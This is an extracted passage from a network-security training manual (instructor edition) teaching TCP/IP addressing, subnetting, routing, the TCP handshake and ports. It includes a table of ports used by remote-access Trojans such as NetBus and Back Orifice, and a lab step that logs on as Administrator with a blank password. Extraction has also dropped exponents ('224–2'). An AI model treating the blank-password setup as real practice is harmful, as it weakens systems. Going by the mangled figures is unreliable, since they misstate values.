RFCsWith all the standards defined in the previous section, you may be asking whereto go to find the standards. The answer is to the RFCs. A Request For Comments(RFC) is the industry location for standards relating to TCP/IP and the Internet.RFCs are freely available documents to read and study, and if you ever want togo directly to the source, be sure to use the RFC.

Although you will find RFCs listed all over the Internet, to view them all onlinego to: www.rfc-editor.org. This is the Web site with a searchable index of allRFCs. There are several RFCs you should be familiar with, and that you shouldknow by name to look up. This way you will not have to search hundreds ofresponses to find what you need. The RFCs you should know are:

• The Internet Protocol (IP): RFC 791

• The Internet Control Messaging Protocol (ICMP): RFC 792

• The Transmission Control Protocol (TCP): RFC 793

• The User Datagram Protocol (UDP): RFC 768

Headers and theEncapsulation Process

Key RFCs

6 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 60: SCNP Hardening

The Function of IPThe Internet Protocol (which works at the Network layer of both the OSI and theTCP/IP models), by definition, has a simple function. IP identifies the currenthost—via an address—and using addressing, moves a packet of information fromone host to another. Each host on the network has a unique IP address, and eachpacket the host sends will contain its own IP address and the IP address to whichthe packet is destined.

The packets are then directed, or routed, across the network, using the destinationaddress, until they reach their final destination. The receiving host can read the IPaddress of the sender and send a response, if required.

Although it sounds straightforward, and does work, there are drawbacks. Forinstance, when packets are sent from one host to another, they may be receivedout of order. IP has no mechanism for dealing with that problem. Also, packetscan get lost or corrupted during transmission, again a problem IP does notmanage. These problems are left to an upper protocol to manage. Often that pro-tocol will be TCP, as you will see in the following topic.

Binary, Decimal, and Hexadecimal ConversionsEven though you may be familiar with the concept of binary math, you may wishto review this section briefly. In binary, each bit has the ability to be either a 1 ora 0. In computers, these bits are stored in groups of 8. Since each bit can beeither a 1 or a 0, each location is designated a power of 2. A byte, therefore, hasbinary values from 20 through 27. In Figure 1-4, you can see the value of each ofthe 8 bits in a byte.

When the bits are presented as a byte, the value of each of the 8 locations isadded to present you with the decimal equivalent. For example, if all 8 bits were1s, such as 11111111, then the decimal value would be 255 or128+64+32+16+8+4+2+1. Here are a few other quick binary to decimal conver-sions:

Binary 11000000 is decimal 192 or 128+64+0+0+0+0+0+0

Binary 10000000 is decimal 128 or 128+0+0+0+0+0+0+0

Binary 10000010 is decimal 130 or 128+0+0+0+0+0+2+0

Binary 01011010 is decimal 90 or 0+64+0+16+8+0+2+0

The IP addresses that are either manually or dynamically assigned to a host are32-bit fields, often shown as four decimal values for ease of reading. Forexample, a common address would be 192.168.10.1. Each number is an 8-bitbinary value, or an octet. In this example, the first octet is 192, the second 168,the third 10, and the fourth 1.

Even though the fourth octet is given a decimal value of 1, it is still given an8-bit value in IP addressing. Each bit of the 32-bit address must be represented,so the computer sees a decimal 1 in an IP address as 00000001. Keeping this inmind, the full decimal IP address of 192.168.10.1 is seen to the computer asbinary IP address: 11000000.10101000.00001010.00000001

In tools that are designed to capture and analyze network traffic, the IP address isoften represented in its hexadecimal (Hex) format. The ability to view and recog-nize addressing in Hex format is a useful skill to have when you are workingwith TCP/IP. In hexadecimal format, the IP address 192.168.10.1 is C0-A8-0A-01. Following is a quick summary on Hex conversions.

Lesson 1: Advanced TCP/IP 7

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 61: SCNP Hardening

To convert the decimal address 192.168.10.1 to hexadecimal, convert each of itsoctets, then combine the results, as follows:

1. Divide 192 by 16. The result is 12, with a remainder of 0. Because decimal12 is the same as Hex C and decimal 0 is the same as Hex 0, decimal 192 isequal to Hex C0.

2. Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 isequal to Hex A8.

3. Decimal 10 is the same as Hex A.

4. Decimal 1 is the same as Hex 1.

5. Combining the results of each conversion shows that decimal 192.168.10.1 isequal to Hex C0A80A01.

Another way to derive this result is to first convert from decimal to binary, thenconvert binary to hexadecimal four bits at a time, and finally, combine the results,as shown here:

1. Decimal 192 is the same as binary 11000000.

2. Decimal 168 is the same as binary 10101000.

3. Decimal 10 is the same as binary 00001010.

4. Decimal 1 is the same as binary 00000001.

5. Binary 1100 (the first four bits of the first octet) is the same as Hex C.

6. Binary 0000 is the same as Hex 0.

7. Binary 1010 is the same as Hex A.

8. Binary 1000 is the same as Hex 8.

9. Binary 0000 is the same as Hex 0.

10. Binary 1010 is the same as Hex A.

11. Binary 0000 is the same as Hex 0.

12. Binary 0001 is the same as Hex 1.

13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal toHex C0A80A01.

IP Address ClassesThere are five defined classes of IP addresses: Class A, Class B, Class C, ClassD, and Class E. The details of each class are as follows:

• Class A IP addresses use the first 8 bits of an IP address to define the net-work, and the remaining 24 bits to define the host. This means there can bemore than 16 million hosts in each Class A network (224–2, because all 1sand all 0s cannot be used as host addresses). All Class A IP addresses willhave a first octet of 0xxxxxxx in binary format. 10.10.10.10 is an exampleof a Class A IP address.

• Class B IP addresses use the first 16 bits to define the network, and theremaining 16 bits to define the host. This means there can be more than65,000 hosts in each Class B network (216–2). All Class B IP addresses willhave a first octet of 10xxxxxx in binary format. 172.16.31.200 is an exampleof a Class B IP address.

• Class C IP addresses use the first 24 bits to define the network, and theremaining 8 bits to define the host. This means there can be only 254 hosts

8 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 62: SCNP Hardening

in each Class C network (28–2). All Class C IP addresses will have a firstoctet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class CIP address.

• Class D IP addressing is not used for hosts, but is often used formulticasting (which will be discussed later), where there is more than onerecipient. The first-octet binary value of a Class D IP address is 1110xxxx.224.0.0.9 is an example of a Class D IP address.

• Class E IP addressing is used for experimental functions and for future use.It does have a defined first-octet binary value as well. All Class E IPaddresses have a first octet binary value of 11110xxx. 241.1.2.3 is anexample of a Class E IP address.

Figure 1-4: IP address classes and their first-octet values.

Private IP Addresses and Special-function IP AddressesThere are several ranges of IP addresses that are not used on the Internet. Theseaddresses are known as private, or reserved, IP addresses. Defined in RFC 1918,any host on any network can use these addresses, but these addresses are notmeant to be used on the Internet, and most routers will not forward them. Byusing these reserved IP addresses, organizations do not have to be as concernedwith address conflicts. The defined private addresses for the three main addressclasses (A, B, and C) are:

• Class A: 10.0.0.0 to 10.255.255.255

• Class B: 172.16.0.0 to 172.31.255.255

• Class C: 192.168.0.0 to 192.168.255.255

In addition to the private address ranges listed, there are a few other addressranges that have other functions. The first is the range of 127.0.0.0 to 127.255.255.255. This address range is used for diagnostic purposes, with the commonaddress of 127.0.0.1 used to identify IP on the host itself. The second range is169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allo-cate addresses to hosts, for Automatic Private IP Addressing (APIPA).

IP Address Classes andTheir First-octet Values

IP Addresses Not Seen onthe Internet

Lesson 1: Advanced TCP/IP 9

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 63: SCNP Hardening

The Subnet MaskAlong with an IP address, each host that uses TCP/IP has a subnet mask. Thesubnet mask is used during a process called ANDing to determine the network towhich the host belongs. The way the mask identifies the network is by the num-ber of bits allocated, or masked, for the network. A bit that is masked is identifiedwith a binary value of 1.

By default, a Class A IP address has 8 bits masked to identify the network, aClass B IP address has 16 bits masked to identify the network, and a Class C IPaddress has 24 bits masked to identify the network. These default subnet masksuse contiguous bits to create the full mask. The following table shows the defaultsubnet masks for the three classes, first in binary, then in the more traditional dot-ted decimal format.

Default Subnet Masks

Class Binary Format Dotted Decimal FormatA 11111111.00000000.00000000.00000000 255.0.0.0B 11111111.11111111.00000000.00000000 255.255.0.0C 11111111.11111111.11111111.00000000 255.255.255.0

The subnet mask can be represented in different formats. For example, one com-mon format is to list the IP address followed by the full subnet mask, such asthis: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write,is to count and record the number of bits that are used as 1s in the subnet mask.For example, in the default subnet mask for Class C there are 24 bits designatedas 1. So, to use the second format, list the IP address followed by a slash and thenumber of bits masked, such as this: 192.168.10.1/24.

Subnetting ExampleIn the event that you need to split a network into more than one range, such ashaving different buildings or floors, you will need to subdivide the network. Thefollowing example will step you through the process of splitting a network andcreating the subnet mask necessary to support the resulting subnetworks.

Let’s say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnetmask and need to break this up into 12 network ranges to support, for example,the 12 major departments in your corporate building. Here’s what you should do:

1. Determine how many bits, in binary, it takes to make up the number of sub-networks you need to create. In binary, 12 is 1100, so you will need 4 bits.

2. Take 4 bits from the host side of the subnet mask and AND them to the net-work side, effectively changing your subnet mask from 255.0.0.0 to 255.240.0.0.

• As you know, the subnet mask tells you where the dividing linebetween network and host bits reside. You started with a network ID of10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this:

00001010.00000000.00000000.00000000 (IP address for network)

11111111.00000000.00000000.00000000 (subnet mask)

• Your dividing line is at the end of the first octet (eight bits starting fromthe left). You have one big network with a network ID of 10.0.0.0, a

Default Subnet Masks

10 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 64: SCNP Hardening

range of usable addresses from: 10.0.0.1 to 10.255.255.254, and abroadcast address of 10.255.255.255.

• The new, divided network looks like this:

00001010.0000 0000.00000000.00000000 (IP address for network)

11111111.1111 0000.00000000.00000000 (subnet mask)

• Notice that the network/host dividing line is now in the middle of thesecond octet. All of your networks will have binary addresses that willlook like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x repre-sents one of the variable bits used to create your subnetworks and yrepresents a bit on the host side of the address.

3. Determine the subnetwork addresses by changing the value of the x bits. Thefirst possible permutation is the 00001010.0000 network; the second is the00001010.0001 network, and so forth. The following table lists all of thepossible subnetwork addresses (notice the pattern?).

Subnetwork Binary Address Decimal AddressFirst 00001010.0000 0000.00000000.00000000 10.0.0.0Second 00001010.0001 0000.00000000.00000000 10.16.0.0Third 00001010.0010 0000.00000000.00000000 10.32.0.0Fourth 00001010.0011 0000.00000000.00000000 10.48.0.0Fifth 00001010.0100 0000.00000000.00000000 10.64.0.0Sixth 00001010.0101 0000.00000000.00000000 10.80.0.0Seventh 00001010.0110 0000.00000000.00000000 10.96.0.0Eighth 00001010.0111 0000.00000000.00000000 10.112.0.0Ninth 00001010.1000 0000.00000000.00000000 10.128.0.0Tenth 00001010.1001 0000.00000000.00000000 10.144.0.0Eleventh 00001010.1010 0000.00000000.00000000 10.160.0.0Twelfth 00001010.1011 0000.00000000.00000000 10.176.0.0Thirteenth 00001010.1100 0000.00000000.00000000 10.192.0.0Fourteenth 00001010.1101 0000.00000000.00000000 10.208.0.0Fifteenth 00001010.1110 0000.00000000.00000000 10.224.0.0Sixteenth 00001010.1111 0000.00000000.00000000 10.240.0.0

For the first network, the network ID is 10.0.0.0 with a subnet mask of 255.240.0.0. The first usable address is 10.0.0.1, and the last usable address is 10.15.255.254. The broadcast address is 10.15.255.255 (the next possible IP address wouldbe 10.16.0.0, which is the network ID of the second network). The second net-work has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and abroadcast address of 10.16.255.255.

Notice that you needed only 12 networks, but you have 16. That can happen,depending on the number of networks needed. For example, if you had needed 20networks, you would have needed to move the network/host dividing line over 5bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, youwould have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 thatyou used for the first example), which would have given you 32 subnetworks,even though you needed only 20. Consider it room for corporate growth!

Lesson 1: Advanced TCP/IP 11

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 65: SCNP Hardening

Note that any combination of addressing can be represented in different text. Forexample, you may come across a resource that defines the IP address in decimal,and the subnet mask in hexadecimal. You must be able to quickly recognize theaddressing as defined. Use the following task to test your ability to quickly per-form these conversions.

TASK 1A-1Layering and Address Conversions

1. Describe how layering is beneficial to the function of networking.

By using a layered model, network communications can be broken intosmaller chunks. These smaller chunks can each have a specific purpose, orfunction, and in the event an error happens in one chunk, it is possible thatonly that error be addressed, instead of starting over from scratch.

2. If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF-00-00, to which IP network does your computer belong? Provide bothdecimal and Hex notations.

In decimal, the network address is 192.168.0.0; in Hex, the network addressis C0-A8-00-00.

3. If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, towhich IP network does your computer belong? Provide both decimaland Hex notations.

In decimal, the network address is 192.168.0.0; in Hex the network addressis C0-A8-00-00.

RoutingWe will get into routing in more detail later, but we need to address the basicsnow. Being familiar with a network and how one host will communicate withanother host within the same network, what do you think will happen if a hostneeds to send information to a host that is not in its network?

This is exactly the situation where routing is needed. You need to route that infor-mation from your network to the receiving host’s network. Of course, the devicethat makes this possible is the router. The first router you will encounter on yourway out of your network is the default gateway. This is the device that your com-puter will send all traffic to, once it determines that the destination host is notlocal (on the same network as itself). After the default gateway gets a packet ofinformation destined for host User1 on network X, it looks at its routing table(think of this as a sort of directory—telling the router that traffic destined for net-works C, G, F, and X should go out interface 1, traffic destined for networks E,A, B, and R should go out interface 2, and so forth), then the router forwards thepacket out through interface 1. The destination network may or may not beattached to interface 1—the router doesn’t really care at this point—it just for-wards the packet on according to the information in its routing table. This process

router:An interconnection device

that is similar to a bridge butserves packets or frames

containing certain protocols.Routers link LANs at the

Network Layer.

12 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 66: SCNP Hardening

repeats from one router to the next until the packet finally reaches the router thatis attached to the same network as the destination host. When the packet reachesthis router, which is usually also the destination host’s default gateway, it is sentout on the network as a unicast directed to the destination host User1.

VLSM and CIDRThe standard methods of subnet masking discussed earlier are effective; however,there are instances where further subdividing is required, or more control of theaddressing of the network is desired. In these cases, you can use either of thefollowing two options: Variable Length Subnet Masking (VLSM) or ClasslessInterdomain Routing (CIDR).

Think back to the previous example of subnet masking. In particular, let’s take acloser look at the fourth network. It was intended to be used by the IT staff; how-ever, they want to be able to break the rather large network block given to theminto smaller, more manageable blocks. Specifically, they need five smaller subnet-works to be created from their network block of 10.48.0.0 with a subnet mask of255.240.0.0.

This time, let’s represent the IP addresses and subnet masks using the slashmethod: 10.48.0.0/12. Notice the IP address stays the same, but we replace thesubnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, ofcourse, corresponds to 255.240.0.0).

Now, back to the IT staff’s networking issue. You have an already subnetted net-work (10.48.0.0/12) that you would like to split into five smaller networks. Tobegin, you need to ask the same starting question: How many bits does it take tomake 5? In binary, 5 is 101, so you will need three bits. Then, add three bits tothe present subnet mask (don’t worry that it has already been subnetted before—that doesn’t matter). So, now you have 10.48.0.0/15 as your first network addressand new subnet mask.

The new variable range is 00001010.0011xxx y.yyyyyyyy.yyyyyyyy, where thebinary numbers will not change, x represents the variable bits that will make upthe networks, and y designates the host bits.

So, what are the new network addresses?

Subnetwork Binary Address Decimal AddressFirst 00001010.0011000 0.00000000.00000000 10.48.0.0Second 00001010.0011001 0.00000000.00000000 10.50.0.0Third 00001010.0011010 0.00000000.00000000 10.52.0.0Fourth 00001010.0011011 0.00000000.00000000 10.54.0.0Fifth 00001010.0011100 0.00000000.00000000 10.56.0.0Sixth 00001010.0011101 0.00000000.00000000 10.58.0.0Seventh 00001010.0011110 0.00000000.00000000 10.60.0.0Eighth 00001010.0011111 0.00000000.00000000 10.62.0.0

Lesson 1: Advanced TCP/IP 13

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 67: SCNP Hardening

For the first network, the network ID is 10.48.0.0, the usable addresses are 10.48.0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second,the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254,and the broadcast address is 10.51.255.255, and so forth. Did you notice that youhave eight possible networks when you needed only five? Again, you can con-sider it just having more room for expansion.

X-castingWhen a packet is sent from one host to another, the process of routing functionsand the packet is sent as defined. However, the process is different if one host istrying to reach more than one destination, or if one message is to be received byevery other host in the network. These types of communication are referred to asbroadcasting, multicasting, and unicasting.

• Unicast is a term that was created after multicasting and broadcasting werealready defined. A unicast is a directed communication between a singletransmitter and a single receiver. This is how most communication betweentwo hosts happens, with Host A specifically communicating with Host B.

• A broadcast is a communication that is sent out from a single transmittinghost and is destined for all possible receivers on a segment (generally, every-one in the network, since the routers that direct traffic from one network toanother are generally used to stop broadcasts, thereby creating broadcastdomain boundaries). Broadcasting can be done for many reasons, such aslocating another host. For a MAC broadcast, the broadcast address used isFF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on thenetwork settings. For example, if you are on network 192.168.10.0/24 thebroadcast address is 192.168.10.255.

• A multicast is a communication that is sent out to a group of receivers onthe network. Multicasting is often implemented as a means for directing traf-fic from the presenter of a videoconference to the audience. In comparison tothe broadcast, which all receivers on the segment will receive, those whowish to receive a multicast must join a group to do so. Group membership isoften very dynamic and controlled by a user or an application. Currently,Class D addresses are used for multicasting purposes. Remember, Class Dhas IP addresses in the range of 224.0.0.0 to 239.255.255.255.

TASK 1A-2Routers and Subnetting

1. You are using a host that has an IP address of 192.168.10.23 and asubnet mask of 255.255.255.0. You are trying to reach a host with the IPaddress 192.168.11.23. Will you need to go through a router? Explainyour response.

Yes, you will need to go through a router. Your subnet mask defines you asbelonging to network 192.168.10.0, and the remote host you are trying toreach does not belong to your network.

2. Boot your computer to Windows 2000, and log on as Administrator, witha blank (null) password.

X-casting

14 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 68: SCNP Hardening

3. From the Start menu, choose Settings→Network And Dial-upConnections. Right-click the Classroom Hub interface and chooseProperties.

4. Select Internet Protocol (TCP/IP) and click Properties.

5. Click the Advanced button, and verify that the IP Settings tab isdisplayed.

Under Default Gateways, record the IP address here:

For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. Forthe RIGHT side, it is 172.18.0.1.

6. Select the IP address you just recorded, and click Remove. Click OKthree times.

7. Open a command prompt, and ping an address that is not on your localnetwork. For instance, if you are on the LEFT side of the classroom, youcould ping an address in the 172.18.10.0 network, and if you are on theRIGHT side of the classroom, you could ping an address in the 172.16.10.0network.

8. Observe the message you receive. The text “Destination Host unreachable”is displayed. Your computer knows that the ping packet is supposed to go toa computer that is outside your local network but it does not know how toget it there.

9. Switch to the Network And Dial-up Connections Control Panel, and dis-play the properties of the Classroom Hub interface.

10. Select Internet Protocol (TCP/IP), click Properties, and click Advanced.On the IP Settings tab, click the Add button found in the Default Gate-way area.

11. In the TCP/IP Gateway Address box, enter the IP address you recordedearlier in the task, click Add, and click OK three times.

12. Switch back to the command prompt, and try to ping the remoteaddress again.

13. Observe the message you receive. This time, as long as the other comput-er’s default gateway is correctly configured, you should be successful inpinging the remote computer. This is because your computer now knows tosend traffic to the router if that traffic is destined for another network. (Howthe routers know where to send the traffic is covered later in the course.)Contact your instructor if your ping attempt is not successful.

14. Close all open windows.

Be prepared to diagram orotherwise explain theclassroom setup.

The recommended classroomlayout is shown in Figure0-1.

Students must be able toping all computers withinthe classroom for theremaining tasks to workproperly. If any students arenot successful in thesecond ping attempt, helpthem troubleshoot theissue.

Lesson 1: Advanced TCP/IP 15

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 69: SCNP Hardening

Topic 1BAnalyzing the Three-way HandshakeAlthough a great deal of emphasis is given to IP due to the addressing and mask-ing issues, TCP deserves equal attention from the security professional. Inaddition to TCP, the other protocol that functions as a transport protocol is UDP.This topic will concentrate on TCP; however, a brief discussion on UDP iswarranted. The following table provides a brief comparison of the two protocols.

Comparing TCP and UDP

TCP UDPConnection-oriented ConnectionlessSlower communications Faster communicationsConsidered reliable Considered unreliableTransport Layer Transport Layer

TCP provides a connection-oriented means of communication, whereas UDP pro-vides connectionless communication. The connection-oriented function of TCPmeans it can ensure reliable transmission, and can recover if transmission errorsoccur. The connectionless function of UDP means that packets are sent with theunderstanding they will make it to the other host, with no means of ensuring thereliability of the transmission.

UDP is considered faster because less work is done between the two hosts thatare communicating. Host 1 simply sends a packet to the address of host 2. Thereis nothing built into UDP to provide for host 1 checking to see if host 2 receivedthe packet, or for host 2 sending a message back to host 1, acknowledgingreceipt.

TCP provides the functions of connection-oriented communication by using fea-tures such as the three-way handshake, acknowledgements, and sequencenumbers. In addition to these features, a significant part of TCP is the use of con-trol flags. There are six TCP control flags in a TCP header, each with a specificmeaning.

security:A condition that results from

the establishment andmaintenance of protective

measures that ensure a stateof inviolability from hostile

acts or influences.

Comparing TCP and UDP

TCP Features

16 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 70: SCNP Hardening

TCP FlagsThe TCP flags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These flagsmay also be identified as S, ack, F, R, P, and urg. Each of these flags occupiesthe space of one bit in the header, and if they are assigned a value of 1, they areconsidered on. The function of each flag is identified as follows:

• The SYN, or S, flag represents the first part of establishing a connection.The synchronizing of communication will generally be in the first packet ofcommunication.

• The ACK, or ack, flag represents acknowledgement of receipt of data fromthe sending host. This is sent during the second part of establishing a con-nection, in response to the sending host’s SYN request.

• The FIN, or F, flag represents the sender’s intentions of terminating the com-munication in what is known as a graceful manner.

• The RESET, or R, flag represents the sender’s intentions to reset thecommunication.

• The PUSH, or P, flag is used when the sending host requires data to bepushed directly to the receiving application, and not fill in a buffer.

• The URGENT, or urg, flag represents that this data should take precedenceover other data transmissions.

Sequence and Acknowledgement NumbersIn addition to the TCP flags, another critical issue of TCP is that of numbers:sequence and acknowledgement numbers, to be specific. Because TCP has beendefined as a reliable protocol that has the ability to provide for connection-oriented communication, there must be a mechanism to provide these features.Sequence and acknowledgement numbers are what provide this.

Sequence NumbersThe sequence number is found in the TCP header of each TCP packet and is a32-bit value. These numbers allow the two hosts a common ground for communi-cation, and allow for the hosts to identify packets sent and received. If a largeWeb page requires several TCP packets for transmission, sequence numbers areused by the receiving host to reassemble the packets in the proper order and pro-vide the full Web page for viewing.

When a host sends the request to initiate a new connection, an Initial SequenceNumber (ISN) must be chosen. There are different algorithms by different ven-dors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a32-bit number that increments by one every 4 microseconds.

Acknowledgement NumbersThe acknowledgement number is also found in the TCP header of each TCPpacket, and is also a 32-bit value. These numbers allow the two hosts to be givena receipt of data delivery. An acknowledgement number is in the packet header inresponse to a sequence number in the sending packet.

In the event that the sending host does not receive an acknowledgement for atransmitted packet in the defined timeframe, the sender will retransmit the packet.This is how TCP provides reliable delivery. If a packet seems to have been lost,the sender will retransmit it.

TCP Flags

Lesson 1: Advanced TCP/IP 17

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 71: SCNP Hardening

ConnectionsAll communication in TCP/IP is done with connections between two hosts. Eachconnection is opened (or established), data is sent, and the connection is closed(or torn down). These connections have very specific rules they must follow.There are two different states of the open portion of this process: Passive Openand Active Open.

• Passive Open is when a running application tells TCP that it is ready toreceive inbound requests via TCP. The application is assuming inboundrequests are coming, and is prepared to serve those requests. This is alsoknown as the listening state, as the application is listening for requests tocommunicate.

• Active Open is when a running application tells TCP to start a communica-tion session with a remote host (which is in Passive Open state). It ispossible for two hosts in Active Open to begin communication. It is not arequirement that the remote host be in Passive Open, but that is the mostcommon scenario.

Connection EstablishmentIn order for the sequence and acknowledgement numbers to have any function, asession between the two hosts must be established. This connection establishmentis called the three-way handshake. The three-way handshake involves three dis-tinct steps, which are detailed as follows (please refer to Figure 1-5 when readingthis section):

1. Host A sends a segment to Host C with the following:

SYN = 1 (The session is being synchronized.)

ACK = 0 (There is no value in the ACK field, so this flag is a 0.)

Sequence Number = x, where x is a variable. (x is Host A’s ISN.)

Acknowledgement Number = 0

2. Host C receives Host A’s segment and responds to Host A with the follow-ing:

SYN = 1 (The session is still being synchronized.)

ACK = 1 (The acknowledgement flag is now set, as there is an ackvalue in this segment.)

Sequence Number = y, where y is a variable. (y is Host C’s ISN.)

Acknowledgement Number = x + 1 (The sequence number from HostA, plus 1.)

3. Host A receives Host C’s segment and responds to Host C with the follow-ing:

SYN = 0 (Session is synchronized with this segment; further requestsare not needed.)

ACK = 1 (The ack flag is set in response to the SYN from the previoussegment.)

Sequence Number = x + 1 (This is the next sequence number in series.)

Acknowledgement Number = y + 1 (The sequence number from HostC, plus 1.)

18 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 72: SCNP Hardening

At this point, the hosts are synchronized and the session is established in bothdirections, with data transfer to follow.

Figure 1-5: The three-way handshake.

Connection TerminationIn addition to specific steps that are involved in the establishment of a sessionbetween two hosts, there are equally specific steps in the termination of thesession. There are two methods of ending a session using TCP. One is consideredgraceful, and the other is non-graceful.

A graceful shutdown happens when one host sends a message (using the FINflag) to the other, stating it is time to end the session; the other acknowledges;and they both end the session. A non-graceful shutdown happens when one hostsimply sends a message (using the RESET flag) to the other, indicating the com-munication has stopped, with no acknowledgements and no further messages sent.In this section, we will investigate the details of the standard graceful termination.

As you saw earlier, it requires three segments to establish a TCP session betweentwo hosts. The other side of the session, the graceful termination, requires foursegments. Four segments are required because TCP is a full-duplex communica-tion protocol (meaning data can be flowing in both directions independently). Asper the specifications of TCP, either end of a communication can end the sessionby sending a FIN, which has a sequence number just as a SYN has a sequencenumber.

Similar to the Active and Passive Opens mentioned earlier, there are also Activeand Passive Closes. The host that begins the termination sequence, by sending thefirst FIN, is the host performing the Active Close. The host that receives the firstFIN is the host that is performing the Passive Close. The graceful teardown of asession is detailed as follows (please refer to Figure 1-6 when reading this sec-tion):

1. Host A initiates the session termination to Host C with the following:

FIN = 1 (The session is being terminated.)

ACK = 1 (There is an ack number, based on current communication.)

Sequence Number (FIN number) = s (s is a variable based on the cur-rent communication.)

Acknowledgement Number = p (p is a variable based on the currentcommunication.)

2. Host C receives Host A’s segment and replies with the following:

FIN = 0 (This segment is not requesting closure of the session.)

ACK = 1 (This segment does contain an ack number.)

The Three-way Handshake

Lesson 1: Advanced TCP/IP 19

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 73: SCNP Hardening

Sequence Number = Not Present (As there is no FIN, there is nosequence number required.)

Acknowledgement Number = s + 1 (This is the response to Host A’sFIN.)

3. Host C initiates the session termination in the opposite direction with thefollowing:

FIN = 1 (The session is being terminated.)

ACK = 1 (There is an ack number.)

Sequence Number = p (p is a variable based on the currentcommunication.)

Acknowledgement Number = s + 1 (This is the same as in the previoussegment.)

4. Host A receives the segments from Host C and replies with the following:

FIN = 0 (This segment does not request a termination, there is noSYN.)

ACK = 1 (This segment does contain an ack number.)

Sequence Number = Not Present

Acknowledgement Number = p + 1 (This is Host C’s sequence number,plus 1.)

At this point the session has been terminated. Communication in both directionshas had a FIN requested and an acknowledgement to the FIN, closing the session.

Figure 1-6: Connection termination.

PortsYou have been introduced to the fact that IP deals with addressing and thesending/receiving of data between two hosts, and you have been introduced to thefact that TCP can be selected to provide reliable delivery of data. However, if aclient sends a request to a server that is running many services, such as WWW,NNTP, SMTP, and FTP, how does the server know which application is supposedto receive the request? The answer is by specifying ports.

Connection Termination

20 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 74: SCNP Hardening

Port numbers are located in the TCP or UDP header, and they are 16-bit values,ranging from 0 to 65535. Port numbers can be assigned to specific functions orapplications. Ports can also be left open for dynamic use by two hosts duringcommunication. There are ranges of ports for each function. There are three maincategories of ports: well-known, registered, and dynamic.

• The well-known ports (also called reserved ports by some) are those in therange of 0 to 1023. These port numbers are assigned to specific applicationsand need to remain constant for the primary services of the Internet to con-tinue to provide the flexibility and usefulness it does today. For example, theWWW service is port 80, the Telnet service is port 23, the SMTP service isport 25, and so on. The well-known port list is maintained by the InternetAssigned Numbers Authority (IANA), and can be found here:www.iana.org/assignments/port-numbers.

• Registered ports are those in the range of 1024 to 49151. These port num-bers can be registered to a specific function, but are not defined or controlledby a governing body, so multiple functions could end up using the sameport.

• Dynamic ports (also called private ports) are those from 49152 to 65535.Any user of the Internet can use dynamic ports.

When a client connects to a server and requests a resource, that client alsorequires a port. The client ports (also called ephemeral ports by some) are usedby a client during one specific connection; each subsequent connection will use adifferent port number. These ports are not assigned to any default service, and areusually a number greater than 1023. There is no defined range for client ports;they can cover the numbers of both the registered and dynamic port ranges.When a client begins a session by requesting a service from a server, such as theWWW service on port 80, the client uses an ephemeral port on the client side.This enables the server to respond to the client. Data is then exchanged betweenthe two hosts using the port numbers established for that session: 80 on theserver side, and a dynamic number greater than 1023 on the client side. The com-bination of the IP address and port is often referred to as a socket, and the twohosts together are using a socket pair to communicate for this session.

The following table lists some of the well-known ports and their associatedservices.

Some Well-known Ports and their Services

Port Service23 Telnet80 HTTP (Standard Web pages)443 Secure HTTP (Secure Web pages)20 and 21 FTP (Data and control)53 DNS25 SMTP119 NNTP

Categories of Ports

Some Well-known Portsand Their Services

Lesson 1: Advanced TCP/IP 21

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 75: SCNP Hardening

In addition to known valid services, such as those listed previously, there aremany Trojan Horse programs that use specific ports (although the port can usu-ally be changed).

Ports Associated with Trojan Horses

Port Number Name of Trojan Horse12345 NetBus1243 Sub Seven27374 Sub Seven 2.131337 Back Orifice54320 (TCP) Back Orifice 2000 (BO2K)54321 (UDP) Back Orifice 2000 (BO2K)

Network MonitorThere is a very valuable tool available with Windows called Network Monitor.This tool allows for full packet capture and lets the analyst (you) peer into thepacket’s contents, examining both the payload, or data, and the headers, in detail.You can see any set flags’s defined sequence and acknowledgement numbers,packet size, and more. The following is a discussion on the use of NetworkMonitor, provided as background for you to be able to perform the tasks in thislesson.

Some of the things you can do with Network Monitor are:

• Monitor real-time network traffic.

